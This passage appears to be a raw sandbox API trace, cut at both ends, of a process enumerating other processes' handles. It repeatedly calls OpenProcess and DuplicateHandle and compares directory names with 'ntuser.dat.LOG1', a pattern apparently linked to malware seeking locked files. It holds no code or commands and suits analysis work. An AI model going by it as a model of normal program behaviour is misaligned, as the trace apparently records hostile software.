lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.158] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.158] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.158] CloseHandle (hObject=0x670) returned 1 [0152.158] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.158] CloseHandle (hObject=0x680) returned 1 [0152.158] CloseHandle (hObject=0x62c) returned 1 [0152.158] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0152.159] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.159] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.160] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.160] CloseHandle (hObject=0x670) returned 1 [0152.160] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.160] CloseHandle (hObject=0x680) returned 1 [0152.160] CloseHandle (hObject=0x62c) returned 1 [0152.160] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0152.160] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.161] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.162] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.162] CloseHandle (hObject=0x670) returned 1 [0152.162] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.162] CloseHandle (hObject=0x680) returned 1 [0152.162] CloseHandle (hObject=0x62c) returned 1 [0152.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0152.162] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.163] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.163] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.163] CloseHandle (hObject=0x670) returned 1 [0152.163] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.163] CloseHandle (hObject=0x680) returned 1 [0152.163] CloseHandle (hObject=0x62c) returned 1 [0152.163] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0152.164] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.164] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.164] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.166] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.166] CloseHandle (hObject=0x670) returned 1 [0152.166] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.166] CloseHandle (hObject=0x680) returned 1 [0152.166] CloseHandle (hObject=0x62c) returned 1 [0152.166] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0152.166] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.167] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.168] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.168] CloseHandle (hObject=0x670) returned 1 [0152.168] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.168] CloseHandle (hObject=0x680) returned 1 [0152.168] CloseHandle (hObject=0x62c) returned 1 [0152.168] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0152.168] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.169] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.169] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.169] CloseHandle (hObject=0x670) returned 1 [0152.169] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.169] CloseHandle (hObject=0x680) returned 1 [0152.170] CloseHandle (hObject=0x62c) returned 1 [0152.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0152.170] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.170] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.171] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.171] CloseHandle (hObject=0x670) returned 1 [0152.171] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.171] CloseHandle (hObject=0x680) returned 1 [0152.171] CloseHandle (hObject=0x62c) returned 1 [0152.171] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0152.171] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.172] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.172] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.173] CloseHandle (hObject=0x670) returned 1 [0152.173] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.173] CloseHandle (hObject=0x680) returned 1 [0152.173] CloseHandle (hObject=0x62c) returned 1 [0152.173] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0152.173] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.174] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.174] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.174] CloseHandle (hObject=0x670) returned 1 [0152.174] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.174] CloseHandle (hObject=0x680) returned 1 [0152.174] CloseHandle (hObject=0x62c) returned 1 [0152.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0152.174] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.175] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.176] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.176] CloseHandle (hObject=0x670) returned 1 [0152.176] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.176] CloseHandle (hObject=0x680) returned 1 [0152.176] CloseHandle (hObject=0x62c) returned 1 [0152.176] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0152.176] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.177] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.178] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.178] CloseHandle (hObject=0x670) returned 1 [0152.178] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.178] CloseHandle (hObject=0x680) returned 1 [0152.178] CloseHandle (hObject=0x62c) returned 1 [0152.178] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0152.179] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.179] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.180] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.180] CloseHandle (hObject=0x670) returned 1 [0152.180] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.180] CloseHandle (hObject=0x680) returned 1 [0152.180] CloseHandle (hObject=0x62c) returned 1 [0152.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0152.180] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.181] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.182] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.182] CloseHandle (hObject=0x670) returned 1 [0152.182] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.182] CloseHandle (hObject=0x680) returned 1 [0152.182] CloseHandle (hObject=0x62c) returned 1 [0152.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0152.182] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.183] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.183] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.183] CloseHandle (hObject=0x670) returned 1 [0152.184] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.184] CloseHandle (hObject=0x680) returned 1 [0152.184] CloseHandle (hObject=0x62c) returned 1 [0152.184] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0152.184] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.184] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.186] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.186] CloseHandle (hObject=0x670) returned 1 [0152.186] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.186] CloseHandle (hObject=0x680) returned 1 [0152.186] CloseHandle (hObject=0x62c) returned 1 [0152.186] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0152.186] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.187] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.188] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.188] CloseHandle (hObject=0x670) returned 1 [0152.188] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.188] CloseHandle (hObject=0x680) returned 1 [0152.188] CloseHandle (hObject=0x62c) returned 1 [0152.188] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0152.188] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.189] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.190] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.190] CloseHandle (hObject=0x670) returned 1 [0152.190] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.190] CloseHandle (hObject=0x680) returned 1 [0152.190] CloseHandle (hObject=0x62c) returned 1 [0152.190] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0152.190] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.191] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.192] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.192] CloseHandle (hObject=0x670) returned 1 [0152.192] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.192] CloseHandle (hObject=0x680) returned 1 [0152.192] CloseHandle (hObject=0x62c) returned 1 [0152.192] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0152.192] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.193] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.194] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.194] CloseHandle (hObject=0x670) returned 1 [0152.194] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.194] CloseHandle (hObject=0x680) returned 1 [0152.194] CloseHandle (hObject=0x62c) returned 1 [0152.194] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0152.194] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.195] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.196] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.196] CloseHandle (hObject=0x670) returned 1 [0152.196] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.196] CloseHandle (hObject=0x680) returned 1 [0152.196] CloseHandle (hObject=0x62c) returned 1 [0152.196] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0152.196] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.197] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.197] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.198] CloseHandle (hObject=0x670) returned 1 [0152.198] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.198] CloseHandle (hObject=0x680) returned 1 [0152.198] CloseHandle (hObject=0x62c) returned 1 [0152.198] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0152.198] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.199] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.199] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.199] CloseHandle (hObject=0x670) returned 1 [0152.199] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\ntuser.dat.LOG1") returned 4 [0152.200] CloseHandle (hObject=0x680) returned 1 [0152.200] CloseHandle (hObject=0x62c) returned 1 [0152.200] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0152.200] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.200] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.201] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.201] CloseHandle (hObject=0x670) returned 1 [0152.201] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.201] CloseHandle (hObject=0x680) returned 1 [0152.201] CloseHandle (hObject=0x62c) returned 1 [0152.201] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0152.201] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.202] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.202] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.202] CloseHandle (hObject=0x670) returned 1 [0152.202] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0152.202] CloseHandle (hObject=0x680) returned 1 [0152.203] CloseHandle (hObject=0x62c) returned 1 [0152.203] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0152.203] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.203] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.204] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.204] CloseHandle (hObject=0x670) returned 1 [0152.204] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.204] CloseHandle (hObject=0x680) returned 1 [0152.204] CloseHandle (hObject=0x62c) returned 1 [0152.204] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0152.204] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.205] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.205] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.206] CloseHandle (hObject=0x670) returned 1 [0152.206] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.206] CloseHandle (hObject=0x680) returned 1 [0152.206] CloseHandle (hObject=0x62c) returned 1 [0152.206] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0152.206] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.206] WaitForSingleObject (hHandle=0x670, 